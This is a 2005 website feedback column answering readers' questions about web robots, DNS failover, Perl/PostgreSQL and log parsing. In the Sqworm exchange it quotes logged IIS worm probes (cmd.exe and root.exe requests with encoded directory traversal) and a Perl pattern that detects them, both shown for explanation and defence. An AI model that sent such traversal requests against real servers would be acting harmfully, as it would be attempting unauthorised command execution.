Feedback and Hints, January 2005
This month features a new layout and a blog. Also, the previous month's feedback column has been formatted with the new layout.

Feedback:
- Message from iman
- CGI postgres/perl script
- Sqworm -- what is it?
- Re: Sqworm -- what is it?
- Just Testing
- PGTS website
- PGTS website (2)
- MSNbot from 207.46.98.35
- Linknzbot
- PGTS website (3)
- "bad file" error in coldarch script
- New Robot LimeBot
- Getting file types from log file
Hints for this month:
- Using awk in vi (again)
Message from iman
From: ssss@nodomain
Date: Sat, 1 Jan 2005 11:18:03 +1100 (EST)

Dear Webmaster,
-- Message Follows --
thanks i have a picture sex
-- Message Ends --
From: 80.191.11.17
Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt; FunWebProducts)

Ed: Well, I'm glad to hear that one of our readers is happy! Enjoy your pictures, wherever you got them from ... Just be careful you don't go blind! Well, he might be happy, but possibly a little confused, since we don't offer such pictures at this website ... Perhaps he intended this message for someone else? Iman (if that is his name) sent this message from a netblock that is owned by Alborz Computer Co. in Tehran. His browser also has the FunWebProducts add-in, which according to most MS pundits is spyware. He might be getting more than he bargained for ... (Oh what a tangled web we weave ...)
Using awk in vi (again)
Date: Sat, 15 Jan 2005 01:07:33 +1100
From: Gerry Patterson

Ed: Recently I started a blog. The first entry contained a rather lengthy programming tip, and then I thought it would be better to put it here (rather than in the blog). I was using vi (as I do most of the time when I am writing an email or just about any document). I wanted to include a list of agents that had visited the PGTS web site and had the word 'Tiscali' in them. So I used the following SQL to fetch a list of these in last_visit order:

cust=> select agent_id, name, last_visit, coalesce(ip_addr,'-')
       from webagents
       where (agent_string like '%Tiscal%' or agent_string like '%tiscal%')
         and robot_ind = 0
       order by last_visit;

That SQL produces a report consisting of four columns separated with a '|' character. This can easily be turned into a bunch of URLs with an awk one-liner ... The URLs point to the PGTS agent_string database. Here is what the output looked like:

 agent_id |  name   |       last_visit       |      coalesce
----------+---------+------------------------+-------------------
     1892 | MSIE    | 2002-10-02 00:12:18+10 | -
     3912 | MSIE    | 2003-01-19 20:21:33+11 | -
     5119 | MSIE    | 2003-03-17 02:25:37+11 | -
     6604 | MSIE    | 2003-05-12 21:50:35+10 | -
     6780 | MSIE    | 2003-05-19 06:51:31+10 | -
    13479 | MSIE    | 2004-02-03 09:51:46+11 | 81.131.120.3/32
    14380 | MSIE    | 2004-02-14 08:21:40+11 | 205.188.209.71/32
    14355 | MSIE    | 2004-02-14 15:46:20+11 | 195.93.34.10/32
    14347 | MSIE    | 2004-02-15 21:22:12+11 | 62.252.0.4/32
    16726 | MSIE    | 2004-03-15 10:25:49+11 | 82.3.65.27
    16901 | MSIE    | 2004-04-07 03:42:42+10 | 82.84.196.145
    20300 | Tiscali | 2004-06-06 20:45:30+10 | 80.46.188.101
    21189 | MSIE    | 2004-07-09 07:07:12+10 | 81.152.109.248
    23415 | MSIE    | 2004-11-01 09:14:17+11 | 193.60.159.61
    24192 | MSIE    | 2004-12-07 20:15:21+11 | 196.30.113.163
     1450 | MSIE    | 2004-12-08 02:07:34+11 | 62.11.130.225
     3844 | MSIE    | 2004-12-13 07:20:37+11 | 81.26.104.195
(17 rows)

I then cut and pasted the output from the SQL into the vi session that I was running, and used the following command:

!}!awk '{print "<a href=|http://www.pgts.com.au/cgi-bin/psql?w0302=" $1 "|>" $3,$5,$NF "</a>"}'

(The first two keystrokes are the movement command ... and the script in single quotes is an awk one-liner.)
Then this was followed by the substitute command:

:.,.+16s/|/"/g

(which changes the '|' character into '"'). This created the following text:

<a href="http://www.pgts.com.au/cgi-bin/psql?w0302=1892">MSIE 2002-10-02 -</a>
<a href="http://www.pgts.com.au/cgi-bin/psql?w0302=3912">MSIE 2003-01-19 -</a>
<a href="http://www.pgts.com.au/cgi-bin/psql?w0302=5119">MSIE 2003-03-17 -</a>
<a href="http://www.pgts.com.au/cgi-bin/psql?w0302=6604">MSIE 2003-05-12 -</a>
<a href="http://www.pgts.com.au/cgi-bin/psql?w0302=6780">MSIE 2003-05-19 -</a>
<a href="http://www.pgts.com.au/cgi-bin/psql?w0302=13479">MSIE 2004-02-03 81.131.120.3/32</a>
<a href="http://www.pgts.com.au/cgi-bin/psql?w0302=14380">MSIE 2004-02-14 205.188.209.71/32</a>
<a href="http://www.pgts.com.au/cgi-bin/psql?w0302=14355">MSIE 2004-02-14 195.93.34.10/32</a>
<a href="http://www.pgts.com.au/cgi-bin/psql?w0302=14347">MSIE 2004-02-15 62.252.0.4/32</a>
<a href="http://www.pgts.com.au/cgi-bin/psql?w0302=16726">MSIE 2004-03-15 82.3.65.27</a>
<a href="http://www.pgts.com.au/cgi-bin/psql?w0302=16901">MSIE 2004-04-07 82.84.196.145</a>
<a href="http://www.pgts.com.au/cgi-bin/psql?w0302=20300">Tiscali 2004-06-06 80.46.188.101</a>
<a href="http://www.pgts.com.au/cgi-bin/psql?w0302=21189">MSIE 2004-07-09 81.152.109.248</a>
<a href="http://www.pgts.com.au/cgi-bin/psql?w0302=23415">MSIE 2004-11-01 193.60.159.61</a>
<a href="http://www.pgts.com.au/cgi-bin/psql?w0302=24192">MSIE 2004-12-07 196.30.113.163</a>
<a href="http://www.pgts.com.au/cgi-bin/psql?w0302=1450">MSIE 2004-12-08 62.11.130.225</a>
<a href="http://www.pgts.com.au/cgi-bin/psql?w0302=3844">MSIE 2004-12-13 81.26.104.195</a>

(Try it yourself ... Go back, cut out the report above, and then enter the commands into vi.)
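The same transformation can also be done outside vi. Here is a small Perl sketch that reads the saved psql report from a file and prints the same links; the file name in the usage line is just an example, and it assumes the '|' separated output shown above.

#!/usr/bin/perl
# make_links.pl -- turn the '|' separated psql report into HTML links
# usage (example only): perl make_links.pl tiscali_report.txt
use strict;
use warnings;

while (my $line = <>) {
    next unless $line =~ /^\s*\d+\s*\|/;          # skip the header, dashes and "(17 rows)"
    my @f = split /\|/, $line;
    foreach my $field (@f) {                      # trim each column
        $field =~ s/^\s+//;
        $field =~ s/\s+$//;
    }
    my ($id, $name, $ts, $ip) = @f;
    my ($date) = split ' ', $ts;                  # keep only the date part of last_visit
    print qq{<a href="http://www.pgts.com.au/cgi-bin/psql?w0302=$id">$name $date $ip</a>\n};
}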
CGI postgres/perl script
From: Sudheer
Date: Sat, 15 Jan 2005 17:08:08 +1100 (EST)

Dear Webmaster,
-- Message Follows --
how to connect my postgres database to perl? i have used the following script in my perl program.

#!/usr/bin/perl
use CGI qw(:standard);
use DBI;
use strict;
use CGI::Carp qw/fatalsToBrowser/;

$query = new CGI;
print $query->header;

# my $dbname = 'test';
# Connect to database
# my $conn = Pg::connectdb("dbname=$dbname");
# if ($conn->status != PGRES_CONNECTION_OK) {
#    die "ERR: Couldn't open connection: ".$conn->errorMessage."\n";
# }

$dbh = DBI->connect("dbi:Pg:dbname=test", "postgres", "",
                    {AutoCommit => 1, RaiseError => 1});

print $query->start_html("FIREWALL");
print "<center><H1>FIREWALL</H1></center>\n";

&print_prompt($query);
&do_work($query);
&print_tail;

$dbh->disconnect;
print $query->end_html;

sub print_prompt {
    my($query) = @_;
    print $query->start_multipart_form;
    print "<BR>IP Adress:";
    print $query->popup_menu(-name=>'IP Adress',
            -Values=>['10.0.0.1','10.0.0.2','10.0.0.3','10.0.0.4','10.0.0.5','10.0.0.6'],
    );
    print "Source IP Adress:";
    print $query->textfield('numeric');
    print "Destination IP Adress:</BR>";
    print $query->textfield('Dest');
    print $query->radio_group(-name=>'Disable Enable',
            -Values=>['Disable','Enable'],
    );
    print "<P><center>",$query->submit('Action','save');
    print $query->submit('Action','cancel');
    print $query->endform;
}

-- Message Ends --
From: 202.153.35.138
Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20040206
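Ed: For what it's worth, a minimal working pattern for talking to PostgreSQL from Perl with DBI looks like the sketch below. The database name, user and table are placeholders for illustration only; they are not Sudheer's actual setup.

#!/usr/bin/perl
# minimal DBI/DBD::Pg sketch -- database name, user and table are placeholders
use strict;
use warnings;
use DBI;

my $dbh = DBI->connect('dbi:Pg:dbname=test', 'postgres', '',
                       { AutoCommit => 1, RaiseError => 1 })
    or die "Cannot connect: $DBI::errstr\n";

# a hypothetical table, just to show prepare/execute/fetch
my $sth = $dbh->prepare('SELECT rule_id, source_ip, dest_ip FROM firewall_rules');
$sth->execute;
while (my ($id, $src, $dst) = $sth->fetchrow_array) {
    print "$id: $src -> $dst\n";
}
$dbh->disconnect;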
Sqworm -- what is it?
Date: Tue, 18 Jan 2005 11:39:49 +1100
From: Jeremy Hill

Ed: The following message was sent from the PGTS Postmaster for update of the robots file.

Dear Webmaster,
---------------
Name: Sqworm
Version: 2.9.85
Email:
Comments: 'what is Sqworm? it was poking around my server.'
URL:
---------------

Ed: I replied as follows:

G'day,

Not really sure what Sqworm is. When did you see it? The last time I saw it was 2004-08-04 00:16:37 GMT. The netblock 66.194.6/24 is currently owned by Websense (delegated by Time Warner Telecom). This is all I can discover about them:

OrgName:    Websense
OrgID:      WEBSEN-1
Address:    10240 Sorrento Valley Rd
City:       San Diego
StateProv:  CA
PostalCode: 92121
Country:    US

NetRange:   66.194.6.0 - 66.194.6.255
CIDR:       66.194.6.0/24
NetName:    TWTC-NETBLK-4
NetHandle:  NET-66-194-6-0-1
Parent:     NET-66-192-0-0-1
NetType:    Reassigned
RegDate:    2004-01-26
Updated:    2004-01-26

As far as I can tell, the agent they dispatched is a robot. It didn't read robots.txt. It is not aggressive and does not appear impolite. There have been far more hits to my site from people searching for information about Sqworm than there have been from Sqworm itself. I find nothing suspicious about this organisation or their robot (except the name, which is a bit peculiar).

Cheers,
Gerry Patterson

For more information, see below.
Re: Sqworm -- what is it?
From: Jeremy Hill
Date: Tue, 18 Jan 2005 04:13:35 GMT

Ed: Jeremy replied as follows:

Gerry,

I am new to web hosting. I set up an Abyss server on my pc 3 days ago, and am just learning to look over my logs. Here is an excerpt from my log file when Sqworm showed up. Directly after that hit I had some unidentified hits poking around looking for scripts and executables. This is somewhat disturbing to me.

-------------
66.194.6.4 - - [16/Jan/2005:08:37:31 -0600] "GET / HTTP/1.0" 200 9961 "" "Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)"
68.44.229.242 - - [16/Jan/2005:09:45:06 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 223 "" ""
68.44.229.242 - - [16/Jan/2005:09:45:06 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 223 "" ""
68.44.229.242 - - [16/Jan/2005:09:45:06 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 223 "" ""
68.44.229.242 - - [16/Jan/2005:09:45:06 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 223 "" ""
68.44.229.242 - - [16/Jan/2005:09:45:07 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 225 "" ""
68.44.229.242 - - [16/Jan/2005:09:45:07 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 225 "" ""
68.44.229.242 - - [16/Jan/2005:09:45:07 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 225 "" ""
68.44.229.242 - - [16/Jan/2005:09:45:07 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 225 "" ""
68.44.229.242 - - [16/Jan/2005:09:45:07 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 223 "" ""
68.44.229.242 - - [16/Jan/2005:09:45:08 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 223 "" ""
68.44.229.242 - - [16/Jan/2005:09:45:08 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 223 "" ""
68.44.229.242 - - [16/Jan/2005:09:45:08 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 223 "" ""
68.44.229.242 - - [16/Jan/2005:09:45:08 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 225 "" ""
68.44.229.242 - - [16/Jan/2005:09:45:09 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 225 "" ""
-----------

I don't know if the 2 IPs are related. I traced the Sqworm IP (using the 'Tracert' tool at www.DNSstuff.com) to a record for "Office of the Future", apparently last registered in 1992. The IP goes to a UNIX server {core-02-so-0-0-0-0.phnx.twtelecom.net.}, where it appears there is a firewall blocking the 'Tracert' tool. The other IP goes to a Microsoft server on Comcast {pcp0010510861pcs.limstn01.de.comcast.net.} As I said before, I don't know if these two entries are related, but they appear in my log exactly as recorded above. Hopefully this is useful information.

Thanks,
Jeremy Hill

Ed: Jeremy, it is unlikely that these entries are related. The hits from 68.44.229.242 are from a worm which infects only IIS servers. I believe it may be a variant of Nimda. For more information about the worm, see below. Sqworm, despite the name, is actually a robot, and on my site it behaves like one. It appears that someone else sent some feedback about Sqworm here. Unfortunately, at the time I was neglecting my website ... so my apologies to Martha. I have since done some research on Sqworm and investigated Websense. It appears that the robot Sqworm is ridgy-didge (that's Australian for OK).
The netblock is owned by Websense, as previously noted. Websense are a medium-to-large US corporation who sell web-filtering software for proxy servers. They claim to be able to categorise websites, and this robot must be part of their categorisation; they probably use it to build their website database. The name "worm" has come into considerable disrepute, and this no doubt accounts for the general sense of unease that surrounds the Sqworm robot. It is, nevertheless, unfounded. Sqworm is only guilty of being christened with what, at best, could be described as "an unfortunate choice of name". Also, I believe that Websense could do a better job of explaining what their robot does and how their categories work. The whole enterprise seems too secretive. If anyone knows different, please let me know. There is more information about Sqworm in the PGTS blog.

Nimda: The second IP address that was in Jeremy's email was from a real worm. This netblock is owned by Comcast Cable Communications, Inc., Cherry Hill NJ, a large US cable company. The nethandle is NET-68-44-0-0-1, CIDR 68.44.0.0/15. Someone is running an IIS server on one of Comcast's addresses and it has been infected. This IP address returns 7 positives from the openRBL, so their Internet experience is likely to be somewhat diminished. They probably don't know any better. Blars has listed them ... He's a cruel man. Cruel but fair.
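If you want to pick probes like these out of your own logs, a rough Perl sketch follows. The patterns are simply lifted from the excerpt above; the script is illustrative and is not something Jeremy or PGTS actually runs.

#!/usr/bin/perl
# flag_probes.pl -- count Nimda/Code Red style probe requests per client IP
# in an Apache common/combined format log (patterns taken from the excerpt above)
use strict;
use warnings;

my %hits;                                        # probe count per client IP
while (my $line = <>) {
    my ($ip) = $line =~ /^(\S+)/ or next;        # first field is the client IP
    # requests for cmd.exe, root.exe or the classic "..%" traversal tricks
    if ($line =~ m{cmd\.exe|root\.exe|\.\.%(?:25|c0|c1)}i) {
        $hits{$ip}++;
    }
}
for my $ip (sort { $hits{$b} <=> $hits{$a} } keys %hits) {
    print "$ip\t$hits{$ip} probe(s)\n";
}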
Just Testing
From: Anonymous
Date: Wed, 19 Jan 2005 11:24:26 +1100 (EST)

Ed: I received the following notification from the PGTS postmaster:

Dear Webmaster,
My agent string is: Interwebthingy Exploder 8.0000001 (standards compatible; W3C 4.01; [en-GB])
My IP address is: 217.44.1.8
---------------
Name: unknown
Version:
Comments: This is a fake string I entered because I felt like it. And because it helps me analysing my own logfiles because I can filter my own visits.
Owner:
OS:

Ed: I use a combination of agent_string and IP address. That way webmaster hits do not get counted in any stats. BTW: Coming soon ... an updated version of the agent_string information panels that will enable readers to add their own comments.
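For anyone who wants to do the same filtering, a minimal sketch of the idea follows. The IP address and agent string are just the values quoted in the notification above, standing in for whatever you use yourself; this is not the actual PGTS stats code.

#!/usr/bin/perl
# drop the webmaster's own traffic before computing stats;
# the IP address and agent string below are placeholders
use strict;
use warnings;

my $my_ip    = '217.44.1.8';
my $my_agent = 'Interwebthingy Exploder 8.0000001';

while (my $line = <>) {
    my ($ip)    = $line =~ /^(\S+)/;             # first field of the log line
    my ($agent) = $line =~ /"([^"]*)"\s*$/;      # agent is the last quoted field in a combined log
    next if defined $ip && defined $agent
         && $ip eq $my_ip && index($agent, $my_agent) >= 0;
    print $line;                                 # everything else passes through to the stats run
}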
PGTS website
From: Stephen Hampson
Date: Wed, 19 Jan 2005 13:06:14 +1100

Hi Gerry,

I'm not sure if you are aware, but a lot of the time when I try to reach your website it is unavailable. The DNS seems to not resolve. When I try to ping your hostname I get:

"Ping request could not find host www.pgts.com.au. Please check the name and try again."

Thanks
Steve

Ed: I thought that this might be a network problem upstream, since I have accessed my website many times in the Melbourne metropolitan area without any obvious problems. It turned out that this was a network problem, and the problem was my network! More below ...
PGTS website (2)
Date: Thu, 20 Jan 2005 13:14:19 +1100
From: Stephen Hampson

Gerry,

I'm not sure what you are looking for with the pings, but I'll forward them to you? As I said before, the DNS server on 203.213.17.10 is either not running or is unreachable. If you log into that box and run:

dig @127.0.0.1 www.pgts.com.au

what is the output?

Thanks
Steve

Ed: Unfortunately I did not read Steve's email carefully. I checked my primary DNS, saw that it was working (of course) ... but he was asking about my secondary DNS! He was away the next day, and did not get my email till Monday ... Fortunately he persisted ... and in one of those awful (dohhh!) moments, I realised that my secondary DNS was not running! I had altered some of the startup scripts and restarted the server when I upgraded to postgres 7.4.5. Deep embarrassment here! I started named. (See Steve's next email below.)
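A quick way to catch this sort of thing is to ask each advertised nameserver for the zone directly, rather than relying on whatever your resolver happens to pick. The sketch below uses the CPAN Net::DNS module; 203.213.17.10 is the secondary Steve mentioned, and the other address is only a placeholder for the primary.

#!/usr/bin/perl
# check that each listed nameserver answers authoritatively for the zone;
# 203.213.17.10 is the secondary mentioned above, 192.0.2.1 is a placeholder
use strict;
use warnings;
use Net::DNS;

my @servers = ('203.213.17.10', '192.0.2.1');    # replace with your own NS list
for my $ns (@servers) {
    my $res = Net::DNS::Resolver->new(nameservers => [$ns],
                                      recurse     => 0,
                                      udp_timeout => 5);
    my $reply = $res->query('www.pgts.com.au', 'A');
    if ($reply) {
        my @addrs = map { $_->address } grep { $_->type eq 'A' } $reply->answer;
        printf "%s answered: %s\n", $ns, join(', ', @addrs);
    } else {
        printf "%s did NOT answer (%s)\n", $ns, $res->errorstring;
    }
}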
MSNbot from 207.46.98.35
From: Chemzoo
Date: Thu, 20 Jan 2005 17:51:25 +1100 (EST)

Dear Webmaster,
Previous Values
---------------
Name: Msnbot
Version: 0.3
Email:
Comments: I got ip address of msnbot as 207.46.98.35, which is not listed

Ed: Chemzoo, the address 207.46.98.35 belongs to Microsoft Corp, as does the MSNbot.
Linknzbot
From: "Dave" Date: Sun, 23 Jan 2005 14:10:31 +1300 > ----- Original Message ----- > From: "PGTS Webmaster" <webmaster@pgts.com.au> > To: <webmaster@linknz.co.nz> > Sent: Sunday, January 23, 2005 12:10 PM > Subject: Link With PGTS.com.au Hi and thanks for listing my search engine on your web site, I have just sent in my web spidering robot (linknzbot) to index your web site into the search engine it reported the following searchable links from your web site: links found : 17 http://www.pgts.com.au/ http://www.pgts.com.au/page01.html http://www.pgts.com.au/page02.html http://www.pgts.com.au/page03.html http://www.pgts.com.au/download/ http://www.pgts.com.au/page04.php http://www.pgts.com.au/pgtsj/ http://www.pgts.com.au/cgi-bin/pgtsj?file=pgtsj0412 http://www.pgts.com.au/cgi-bin/pgtsj?file=pgtsj0211a http://www.pgts.com.au/pgtsj/0501.html http://www.pgts.com.au/cgi-bin/pgtsj?file=pgtsj0204 http://www.pgts.com.au/cgi-bin/pgtsj?file=pgtsj0204a http://www.pgts.com.au/cgi-bin/pgtsj?file=pgtsj0204b http://www.pgts.com.au/cgi-bin/psql?feedback http://www.pgts.com.au/cgi-bin/pgtsj?file=pgtsj0309b http://www.pgts.com.au/cgi-bin/psql?blog http://www.pgts.com.au/cgi-bin/pgtsj?file=pgtsj0302a Optimizing tables... Indexing complete ! People who use the linknz search engine can now find and visit your web site. Many regards Dave Andrews P.S. you should find a new USER AGENT STRING in your log files for the linknzbot which is our web spidering robot, written in C++. Ed: G'day Dave, Thanks for your feedback. I started the Robots Collections a couple of years ago, as a sort of hobby, because I was looking for things to write about, when I started publishing articles online. It has turned out to be a very popular topic with webmasters. And for that reason, I am trying to categorise Bots when I see them. I have now settled on the following categories (not mutually exclusive). Aggressive Hard-hitting Impolite Suspicious The default category is blank, this implies that the Bot is polite, obeys robots.txt instructions, does not attempt to cloak or disguise its' behaviour, and is not associated with criminal activities or spamming (which these days looks increasingly as if it will also be considered criminal). Over the next couple of months, I will be updating the collection to reflect these categories. I almost classified your Bot as Hard-hitting. 366 hits in 12 minutes is sort of borderline. However, since they were mostly HEADs rather than GETs, I just made a note in the comments section. Might I suggest that if you intend to do make your crawl sessions any longer, you should introduce a delay. Regards, Gerry Patterson SysAdmin PGTS Pty Ltd
PGTS website (3)
Date: Mon, 24 Jan 2005 10:13:57 +1100
From: "Stephen Hampson"

Yeah, no worries. That was what I was trying to tell you. It looks like Windows DNS does not fail over properly. So if it hits the secondary DNS server (50% chance, because it works in a round-robin way), then there is a fair chance it will never try the primary DNS server and will just fail. Just tried your site then and it works. It wasn't working about 30 mins ago due to this issue. I'll let you know if I experience problems again.

Ed: And I am very grateful that Steve persisted ... despite me being so relentlessly thick-headed! Of course it helps if named is running on your DNS server! I hadn't realised that Windows DNS worked that way ... Obviously I am going to have to fix up those startup scripts. And all those other people with Windows DNS may find that my site works more than 50% of the time now!
"bad file" error in coldarch script
From: Grant September
Date: Mon, 24 Jan 2005 22:31:08 +1100 (EST)

Dear Webmaster,
-- Message Follows --
Hi There, tried to use your coldarch.pl file on NT, but kept on getting a "Bad file" error. i think this is due to my path having a space in the name. do you have a workaround for this as i have no perl programming skills

Ed: I'm sorry Grant, but I have not allowed for spaces in data_file names.
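Without seeing the failing call this is only a guess, but the usual culprit when an NT path with spaces produces that sort of error is a filename being re-parsed on whitespace, either by the script itself or by the command shell it invokes. Two generic Perl patterns that avoid it are sketched below; these are illustrative only, not excerpts from coldarch.pl, and the path shown is made up.

#!/usr/bin/perl
# hypothetical examples only; coldarch.pl itself may fail for a different reason
use strict;
use warnings;

my $path = 'C:/Program Files/Apache Group/Apache/logs/access.log';   # a path with spaces

# 1. Opening the file directly is safe as long as the whole path stays in
#    one scalar -- don't split an argument list on whitespace first.
open my $fh, '<', $path or die "Cannot open '$path': $!\n";
while (<$fh>) {
    # ... process the log ...
}
close $fh;

# 2. When shelling out, use the list form of system() so the path is never
#    re-parsed by the command shell.
system('gzip', '-9', $path) == 0 or warn "gzip failed: $?\n";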
New Robot LimeBot
From: Kenn Sippell
Date: Tue, 25 Jan 2005 05:08:31 +1100 (EST)

Dear Webmaster,
-- Message Follows --
I would like you to be aware of the web robot known as LimeBot - written as part of the free enterprise initiative Cruise Lime. The bot identifies itself with the User-Agent: 'LimeBot/1.0 (+www.cruiselime.com/LimeBot.php)'. I would appreciate it if you included it in your databases for the convenience of those who use your search.
-- Message Ends --

Ed: I replied as follows ...

Kenn,

The agent_strings are added automatically when visitors come to this site. If you are part of the Cruise Lime Enterprise, then I suggest you send the LimeBot to my site. It will be included within 24 hours. I will approve the entry when I see it.

The LimeBot was first seen in the PGTS logs at 2005-01-25 11:12 GMT.
Getting file types from log file
From: Khoa Nguyen
Date: Fri, 28 Jan 2005 12:31:08 +1100 (EST)

Dear Webmaster,
-- Message Follows --
Hi, thanks for the info posted on the site. They are useful for better understanding of the log file. On the web page, you print out 4 columns: IP, Date, Time, and Target. I have trouble separating the file name from the file type. For example, for the Target part, what if I only want to print out the types of file requested (txt, html, ...) instead of the whole file name (data.html)? What if I only want to count how many hits each file type has, instead of how many times the file is requested? When searching through the log file, I could search for the file request, but couldn't search for file type. I have something like: "/\/[\w\d\-\.]+\s/" Please advise. Much appreciate it. Thanks

Ed: Khoa, sorry not to answer this sooner. I have been trying to find time to re-write some of the scripts, and I was hoping to come up with a script that answers this. Unfortunately I did not get around to doing it. I do have a script (which is hooked into the PGTS database), and the way I try to determine the type is by examining the file extensions. Obviously this will be site dependent. However, you could come up with a general solution which uses standard MIME types. The script I have is actually rather complex. It examines each IP address and looks for "Robot" behaviour. For example, suppose we have a subroutine called parse_log which splits each line into its individual components:

($IP,$htime,$cmd,$status,$bytes,$referer,$agent) = parse_log($_);   # assign the components
($page) = (split ' ', $cmd)[1];                                     # the requested path, taken from the request in $cmd

# then we can test for the MIME types
unless ($page){
    $page_type = $NULL;
} elsif ($page =~ /\.jpg$/ || $page =~ /\.gif$/ ){
    $page_type = $IMAGE;
} elsif ($page =~ /\.exe$/ || $page =~ /\.gz$/ || $page =~ /\.msi$/ || $page =~ /\.zip$/){
    $page_type = $BIN;
} elsif ($page =~ /robots\.txt$/ ){
    $page_type = $ROBOT;
} elsif ($page =~ /\.txt$/ || $page =~ /-HOWTO$/ ){
    $page_type = $TXT;
}
# etc ... etc

This is rather cumbersome, but it allows you to tailor the results for your site. You may have particular standards: you may only use gif, jpg and png, or you may do as I do and put all images in the same folder, in which case you would test the first part of $page to see if it was in the folder called /image, etc etc. Hope this helps.
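As a more direct answer to the original question, here is a small standalone sketch (not the PGTS script) that simply counts hits per file extension in a common/combined format log. The choice of treating the extension as the "file type" is the same assumption made above; anything without an extension is lumped together.

#!/usr/bin/perl
# count hits per file extension in an Apache common/combined log;
# a standalone sketch, not the PGTS reporting script
use strict;
use warnings;

my %hits;
while (my $line = <>) {
    # pull the request out of the first quoted field: "GET /dir/data.html HTTP/1.0"
    my ($request) = $line =~ /"([^"]*)"/ or next;
    my (undef, $target) = split ' ', $request;
    next unless defined $target;
    $target =~ s/[?#].*//;                        # drop any query string or fragment
    my ($ext) = $target =~ m{\.([A-Za-z0-9]+)$};  # the "type" is the file extension
    $ext = defined $ext ? lc $ext : '(none)';     # directories and extensionless files
    $hits{$ext}++;
}
for my $ext (sort { $hits{$b} <=> $hits{$a} } keys %hits) {
    printf "%-8s %d\n", $ext, $hits{$ext};
}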